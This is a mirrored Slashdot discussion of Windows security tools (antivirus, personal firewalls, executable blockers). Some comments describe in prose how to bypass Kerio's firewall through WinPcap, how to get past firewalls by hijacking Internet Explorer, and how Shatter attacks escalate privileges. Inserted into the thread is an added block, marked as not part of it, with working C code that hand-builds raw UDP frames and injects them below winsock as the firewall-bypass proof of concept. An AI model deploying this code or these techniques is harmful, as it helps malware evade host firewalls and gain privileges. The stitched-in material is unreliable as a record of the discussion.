Slashdot Mirror


Virus Scanners and Process Authentication for Windows?

cavedwler asks: "Like a lot of people, for one reason or another, I still have Windows running on one of my PCs and have the standard virus scanner, and I wondered if that is enough. I ran across this site and found a program that seems to work well in conjunction with any virus scanner. It blocks any executable or script from running on your PC without your approval. It is not a virus scanner, as it does not search for viruses, but it just does not allow them to run. It also has the ability to monitor files and restore them in real time if they have been modified. I have been running it for a while now and am thinking of recommending it to my boss for use at work. I was wondering if anyone else out there had tried this, or other programs similar to it, in a real-world environment and had any problems or successes."

23 comments

  1. SecureEXE by itwerx · · Score: 2, Interesting

    Sounds a lot like SecureEXE.

  2. theoretically by thexaspect · · Score: 2, Informative

    While this sounds great in theory, if your virus software is as up to date as it should be on an important box, then how would these scripts be a problem? I've had Outlook running on my desktop for YEARS and have received at least one email that contained all of the "famous" viruses/scripts, and I've never had a problem. If you have your software set to NOT OPEN ANYTHING you don't tell it to, you don't have a problem. Save your IT department some money and implement policies or some other such feature. Just my 2 cents...

  3. I use AVG + ZoneAlarm + Ad-aware by rhild · · Score: 5, Informative

    The combination of AVG, ZoneAlarm and Ad-aware will keep your Windows box free of all sorts of nasty things for FREE.
    1. Re:I use AVG + ZoneAlarm + Ad-aware by alyandon · · Score: 2, Interesting

      s/ZoneAlarm/Kerio Personal Firewall/g

      http://www.kerio.com/

      Much more powerful than ZoneAlarm.

    2. Re:I use AVG + ZoneAlarm + Ad-aware by Permission+Denied · · Score: 4, Informative
      Funny thing about Kerio is that it works by hooking calls into wsock32.dll. You can write a simple program that does not use winsock and it bypasses Kerio.

      Download winpcap. Unlike Unix libpcap, it includes both functions to create packets as well as capture them. It does not use winsock but rather installs an NDIS driver that sits lower in the TCP stack. You can then write a simple program that listens for packets and then manually constructs packets with UDP/TCP headers and sends them out. Completely bypasses Kerio.

      If you'd like, I can post the code. I tested this about a month ago and it worked against the latest version of Kerio Personal Firewall. Took about an hour of work for a proof-of-concept program. You could get really crazy and implement a TCP stack in userspace and then write all kinds of trojans that would bypass TPF. Only works with privileged accounts since you need permissions to install an NDIS driver, but outside of controlled corporate environments, all Windows users use the Administrator account anyway.

      Sygate and ZoneAlarm both install low-level NDIS drivers and are not susceptible to this attack. (At least I couldn't figure out how to bypass them - it may be possible to install a TDI hook which sits below NDIS, but this looks like months of work.)

      Other than that, TPF really is much nicer than Sygate or ZoneAlarm, but this is a pretty gaping hole. I'd recommend Sygate over ZoneAlarm.
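
The poster above offers to post a proof-of-concept but none appears in the thread, so here is an added example (written for this page, not the poster's code and not part of the Slashdot thread) of the technique described: hand-building an Ethernet/IPv4/UDP frame with its own checksums and handing it to the NDIS-level WinPcap driver with pcap_sendpacket(), so winsock is never called and a wsock32.dll hook never sees it. The MAC addresses, IP addresses, ports, payload and adapter name are assumptions; the checksum and header layout follow RFC 791 and RFC 768. Build with -DHAVE_PCAP against the WinPcap/Npcap SDK (-lwpcap) to actually inject; without that flag the frame is only built and printed, which is enough to inspect the headers in a hex dump.

```c
/* Added example, not code from the thread. Builds a raw UDP/IPv4 frame and,
 * if HAVE_PCAP is defined, injects it below winsock through WinPcap/Npcap. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#ifdef HAVE_PCAP
#include <pcap.h>
#endif

#define ETH_HLEN 14
#define IP_HLEN  20
#define UDP_HLEN 8

/* RFC 1071 one's-complement sum, accumulated across several byte ranges. */
static uint32_t csum_add(uint32_t sum, const uint8_t *d, size_t len)
{
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((d[i] << 8) | d[i + 1]);
    if (len & 1)                         /* odd trailing byte is the high half */
        sum += (uint32_t)(d[len - 1] << 8);
    return sum;
}

static uint16_t csum_finish(uint32_t sum)
{
    while (sum >> 16)                    /* fold carries back into 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

/* Writes Ethernet II + IPv4 (DF, TTL 64, proto 17) + UDP + payload into out.
 * Returns the frame length, or 0 if it would not fit. */
size_t build_udp_frame(uint8_t *out, size_t cap,
                       const uint8_t dst_mac[6], const uint8_t src_mac[6],
                       uint32_t src_ip, uint32_t dst_ip,
                       uint16_t src_port, uint16_t dst_port,
                       const uint8_t *payload, size_t payload_len)
{
    size_t ip_len = IP_HLEN + UDP_HLEN + payload_len, total = ETH_HLEN + ip_len;
    uint8_t *ip = out + ETH_HLEN, *udp = ip + IP_HLEN, pseudo[12];
    uint16_t udp_csum;
    if (ip_len > 0xffff || total > cap) return 0;
    memset(out, 0, total);
    memcpy(out, dst_mac, 6); memcpy(out + 6, src_mac, 6);
    put16(out + 12, 0x0800);             /* EtherType IPv4 */
    ip[0] = 0x45;                        /* version 4, IHL 5 words */
    put16(ip + 2, (uint16_t)ip_len);     /* total length */
    put16(ip + 4, 0x1234);               /* identification (arbitrary) */
    put16(ip + 6, 0x4000);               /* DF set, fragment offset 0 */
    ip[8] = 64; ip[9] = 17;              /* TTL, protocol UDP */
    put32(ip + 12, src_ip); put32(ip + 16, dst_ip);
    put16(udp, src_port); put16(udp + 2, dst_port);
    put16(udp + 4, (uint16_t)(UDP_HLEN + payload_len));
    memcpy(udp + UDP_HLEN, payload, payload_len);
    /* UDP checksum spans the RFC 768 pseudo-header plus the whole segment */
    put32(pseudo, src_ip); put32(pseudo + 4, dst_ip);
    pseudo[8] = 0; pseudo[9] = 17;
    put16(pseudo + 10, (uint16_t)(UDP_HLEN + payload_len));
    udp_csum = csum_finish(csum_add(csum_add(0, pseudo, sizeof pseudo),
                                    udp, UDP_HLEN + payload_len));
    put16(udp + 6, udp_csum ? udp_csum : 0xffff); /* 0 would mean "none" */
    put16(ip + 10, csum_finish(csum_add(0, ip, IP_HLEN)));
    return total;
}

/* Constructed sample: assumed gateway/host MACs, 192.168.1.10:40000 -> 192.168.1.1:53, "hi". */
size_t build_sample_frame(uint8_t *out, size_t cap)
{
    static const uint8_t gw_mac[6]   = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
    static const uint8_t host_mac[6] = {0x00, 0xaa, 0xbb, 0xcc, 0xdd, 0xee};
    static const uint8_t payload[2]  = {'h', 'i'};
    return build_udp_frame(out, cap, gw_mac, host_mac, 0xC0A8010Au, 0xC0A80101u,
                           40000, 53, payload, sizeof payload);
}

#ifdef HAVE_PCAP
/* Hands the frame to the NDIS driver; dev is an adapter name from
 * pcap_findalldevs(). Loading that driver needs administrative rights. */
int send_frame(const char *dev, const uint8_t *frame, size_t len)
{
    char errbuf[PCAP_ERRBUF_SIZE];
    pcap_t *h = pcap_open_live(dev, 65536, 0, 1000, errbuf);
    int rc;
    if (!h) { fprintf(stderr, "pcap_open_live: %s\n", errbuf); return -1; }
    rc = pcap_sendpacket(h, frame, (int)len);
    pcap_close(h);
    return rc;
}
#endif

int main(void)
{
    uint8_t frame[128];
    size_t i, n = build_sample_frame(frame, sizeof frame);
    for (i = 0; i < n; i++)
        printf("%02x%s", frame[i], (i + 1) % 16 ? " " : "\n");
    putchar('\n');
#ifdef HAVE_PCAP
    return send_frame("\\Device\\NPF_EXAMPLE" /* assumed adapter name */, frame, n);
#else
    return n == 0;
#endif
}
```

Two things the thread's own caveats imply and the code makes visible: the destination MAC has to be the gateway's (a real tool would ARP for it, which is itself just another hand-built frame), and because nothing here goes through the host's TCP/IP stack, a reply would have to be picked up with pcap_loop() and parsed the same way, which is the "TCP stack in userspace" the poster mentions.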

    3. Re:I use AVG + ZoneAlarm + Ad-aware by Anonymous Coward · · Score: 1, Interesting

      all Windows users use the Administrator account anyway.

      I don't. I never log in as Administrator (or as an account in the Administrators group) on my windows box, just as I don't log in as root on my *BSD boxes.

      Just because you don't know how to operate in a windows environment, that doesn't mean that everybody doesn't know. "Runas" is your friend.

    4. Re:I use AVG + ZoneAlarm + Ad-aware by bedessen · · Score: 2

      Actually I think the preferred method for busting through software firewalls these days is just to co-opt a trusted program to do your communications for you. For example, consider a virus/trojan like BUGBEAR or SOBIG, which deploy in stages and often communicate to various hard-coded web URLs for further instructions. All you need to do is create an IE ActiveX control (or script the actual iexplore.exe) and hide its window off-screen or something, and use it to do your http connections... the firewall will allow it through since it's under the context of the browser.

      It all basically boils down to the fact that 99% of people run windows as an administrator, barring corporate environments. If you have administrative privileges you can do just about everything (including adding/removing/starting/stopping services & NDIS adaptors, killing processes, etc.) so the virus might as well just disable the firewall rather than trying to work around it. And if you don't have admin rights, as long as the virus scanner has any kind of user interface that runs from a privileged account (remember that all services run as LOCALSYSTEM by default), you can use one of the Shatter vulnerabilities and gain instant admin access. A lot of people 'poopoo-ed' that vulnerability by saying "this requires local access to the box, and even then it just gives you local admin access" but that's exactly the scenario we're talking about here, and it's the perfect way for a virus/trojan to gain the privileges it needs to hide itself.

      I trust software firewalls about as far as I can throw them... that is to say, I don't.

    5. Re:I use AVG + ZoneAlarm + Ad-aware by Anonymous Coward · · Score: 0

      Then you'll struggle to run older MS apps such as Office 97 which refuse to run on Win2k and XP unless the user is in the Administrator group.

      There are any number of similar problems which crop up which means that a LOT of smaller organisations have general users logged on as admins.

    6. Re:I use AVG + ZoneAlarm + Ad-aware by n0-0p · · Score: 1

      Incorrect.
      You have to open permissions on a few directories and (occasionally) files to make them writeable, but that's it. The easiest way to do this is lock up write access to everything and audit all access failures. Then log on as a normal user and play away. When something fails, view the security log as an admin and you'll see what you need to open up. After you have a list you can automate this for other systems with a cmd script and cacls.
      Several years ago I ran a Windows network with several thousand users and only 5 administrative users. Everyone else was a normal user with the minimum necessary privileges on the system. We hand-tweaked file and directory permissions beyond the defaults and had everything locked up very tightly, even with applications like Office 97. I will admit that there were a few applications that gave us serious headaches (older versions of Corel Draw for example) but overall there were few issues.
      There seems to be some stupid myth that a windows box requires less expertise to administer than a *nix box. Honestly, I'd say that it takes at least as much skill, if not more, to properly admin Windows. The OS is simply not as mature from a security standpoint. This is evidenced in areas like default file permissions, services, and enumeration information. All of this can be properly locked down but it requires significant knowledge to do it and can be very situationally dependent. The more recent versions of Microsoft software, however, show that this is finally sinking in and they are improving the defaults and eliminating unnecessary holes.

    7. Re:I use AVG + ZoneAlarm + Ad-aware by n0-0p · · Score: 1

      You're off on the shatter vulnerability.
      Microsoft's patch removed the WM_TIMER message. Also, on an unpatched box, it will not work if the application has a WM_TIMER handler, which is a trivial fix to implement in source.
      Even if the application is vulnerable, making the exploit work reliably is not trivial, and is different for each version of each application. It's feasible, but a lot more difficult than you imply.

  4. These programs work... by alyandon · · Score: 4, Insightful

    but do you really need them? Stuff like that tends to confuse the non-technical user types.

    I find it far more effective to make sure that people aren't running as privileged users under NT. If they aren't running as a privileged user and you have a decent virus scanner that has up to date definitions you'll take care of 99.9% of the threats out there. Worst case scenario... some virus/worm wipes out the user's documents folder.

    It really isn't that hard to properly secure NT/2000/XP... I just rarely see the IT staff of most companies bothering to do it.

    1. Re:These programs work... by ColaMan · · Score: 2, Insightful

      Worst case scenario... some virus/worm wipes out the user's documents folder.
      or, some virus/worm wipes out the 30GB of corporate data that's on a mapped drive that the user has read/write access to....

      --

      You are in a twisty maze of processor lines, all alike.
      There is a lot of hype here.
  5. I wonder by Rares+Marian · · Score: 1

    What if this software recorded a category and you could choose what category of software you wanted to run? No more clicking on the should this run dialog.

    What an idea? Maybe something could be put into a permissions file. Oh wait...

    --
    The message on the other side of this sig is false.
  6. Small problem.. by ewhenn · · Score: 2, Funny

    ... it always prompts me if I REALLY want to run SexDialer.exe. Of course I do! This bug needs to be fixed!

  7. The idea is neat IF... by floydman · · Score: 2, Insightful

    and only if the people at your work know what they are doing. I used to work in a company where some employees saw the "Download the magical executable and see her ride", and they would (the employees I am talking about are programmers actually, or so called, I am sad to say). So it might be good for you, or your boss, who know what you are doing, but don't assume everyone is as smart, my pal. God created stupidity to haunt us.... FOREVER..:)

    --
    The lunatic is in my head
    1. Re:The idea is neat IF... by KingRamsis · · Score: 1

      Hey, !!
      I actually work in a place so similar to the one you are talking about...
      ;-)

    2. Re:The idea is neat IF... by floydman · · Score: 1

      You should abandon ship at once, leaving the rest of the crew who can't look up the word abandon in the dictionary....

      --
      The lunatic is in my head
  8. some viruses are not directly executable programs by wotevah · · Score: 1

    Some viruses (actually, most) do not come in the directly executable flavor any more, I think.

  9. And slow by phorm · · Score: 1

    I found that one of my biggest beefs with ZoneAlarm is the sheer lag it imposed upon my connections. Not that it's a bad product; I found it extremely useful for locking certain apps from internet access (non-infected apps that liked to "call home") - but when I switched to using an old PC as a routing server things became much faster.

    Of course, back then I didn't know iptables... but there are other solutions that do just as well. 486s with dual NICs can run as these... but hell, an older P1 will handle it very nicely and you can find people giving them away now.

    Of course, ad-aware will always be my friend... and I'm using Norton (just the AV, not the drain-your-resources-suite) so I can't comment on AVG until I try it out later (when my norton subscription runs out, most likely).

  10. Spybot also by antdude · · Score: 1

    Link.

    --
    Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
  11. Trojan Defense System is better by leonbrooks · · Score: 2, Interesting

    Australian made and amazingly comprehensive, especially under the hood.

    --
    Got time? Spend some of it coding or testing
  12. Alot of people? by You're+All+Wrong · · Score: 1

    Like alarge number of people, for along time there's been one
    particular mistake by others at the top of alist of things
    that annoy me. Why can't people be alittle more careful with
    their grammar? One has to draw aline somewhere, don't be aloser.

    YAW.

    --
    Your head of state is a corrupt weasel, I hope you're happy.